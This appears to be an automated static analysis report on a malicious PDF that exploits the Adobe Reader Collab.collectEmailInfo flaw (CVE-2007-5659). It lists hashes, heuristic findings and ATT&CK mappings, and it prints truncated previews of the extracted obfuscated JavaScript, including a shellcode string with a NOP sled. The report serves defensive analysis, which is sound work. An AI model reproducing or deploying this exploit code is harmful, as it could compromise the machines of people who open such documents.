Malicious PDF — malware analysis report

Static analysis result for SHA-256 721ae3675657174b…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows))
MD5: c236e6b6e3326eecc110824e8346239d SHA-1: 86c0a971a3415b2d7d0c8a250b830d8ad7e9434e SHA-256: 721ae3675657174b521c5cc1cbfe0873694a5a764395636873e166a5f427ad63
160 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF sample contains embedded JavaScript that exploits the Collab.collectEmailInfo vulnerability (CVE-2007-5659). The JavaScript is heavily obfuscated but appears to be a downloader for a second-stage payload. The ML classifier strongly flagged this PDF as malicious, supporting the exploitation of a known vulnerability.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9980

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1
d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7		 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 1206312 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
javascript_obj0031_000.js
60bd7206c1c33ef4367ed7c166ac9c3d2f8ff348271c73a0d2ef543f02957c23		 pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 7601 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("%u\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x65\x62\x39\x30%u5\x6518%u5\x6256%u068\x61%u303\x63%u1474%u6\x6266%u49\x630"+
"%u8\x6146%u\x33226%u88\x634%u430\x33%u\x65\x6246%u\x658\x65\x62%u\x66\x66\x653%u\x66\x66\x66\x66"+
"%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444"+
"%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41"+
"%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41"+
"%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743"+
"%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942"+
"%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044"+
"%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43"+
"%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44"+
"%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942"+
"%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b"+
"%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444"+
"%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844"+
"%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743"+
"%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d"+
"%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43"+
"%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643"+
"%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846"+
"%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744"+
"%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244"+
"%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d"+
"%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942"+
"%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44"+
"%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441"+
"%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942"+
"%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445"+
"%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444"+
"%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343"+
"%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52"+
"%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641"+
"%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641"+
"%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143"+
"%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143"+
"%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641"+
"%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644"+
"%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343"+
"%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43"+
"%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142"+
"%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445"+
"%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942"+
"%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641"+
"%u7641%u7641%u4
... (truncated)
generic_stage_recovery_000.js
1aee69bde63deb6f12053eb15ee5b0f1c681c460bbd4b79c81dd08757303d3fe		 deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 7157 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u49c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641%u7641%u7641%u4643%u7143%u6444%u7143%u7641%u7641%u4e43%u674b%u4242%u4242%u4242%u4e43%u5942%u6541%u5142%u4d41%u5945%u7143%u5845%u6141%u7946%u6444%u6444%u6444%u5849%u7a47%u7541%u7641%u6e43%u6c44%u6141%u5743%u6444%u6444%u6444%u5849%u7a47%u5945%u7143%u6444%u784d%u7a47%u7141%u4b43%u7641%u6e43%u5945%u7641%u6e43%u6c44%u7641%u6e43%u7541%u6141%u6843%u6444%u6444%u6444%u5942%u7
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.